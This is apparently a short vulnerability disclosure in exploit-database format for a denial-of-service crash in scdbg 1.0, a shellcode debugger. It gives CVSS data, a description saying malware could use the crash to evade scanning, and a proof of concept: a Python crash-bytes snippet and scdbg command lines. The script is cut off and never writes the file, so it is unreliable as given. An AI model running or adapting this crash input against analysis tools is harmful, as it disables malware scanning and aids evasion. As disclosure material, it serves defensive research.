# Exploit Title: Scdbg 1.0 - Buffer overflow DoS  
# Discovery by: Rafael Pedrero  
# Discovery Date: 2021-06-13  
# Vendor Homepage:  
# Software Link :  
# Tested Version: 1.0 - Compile date: Jun 3 2021 20:57:45  
# Tested on: Windows 7, 10  
CVSS v3: 7.5  
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H  
CWE: CWE-400  
Vulnerability description: scdbg.exe (all versions) is affected by a Denial  
of Service vulnerability that occurs when you use the /foff parameter or  
not with a specific shellcode causing it to shutdown. Any malware could use  
this option to evade the scan.  
Proof of concept:  
Save this script like and execute it: scdbg.exe -foff 1 -f  
scdbg_crash.bin / scdbg.exe -f scdbg_crash.bin  
#!/usr/bin/env python  
crash = "\x90\xF6\x84\x01\x90\x90\x90\x90"  
f = open ("scdbg_crash.bin", "w")  
You can use gui_launcher.exe and check "Start offset 0x": 1 or directly  
without check  
[image: image.png]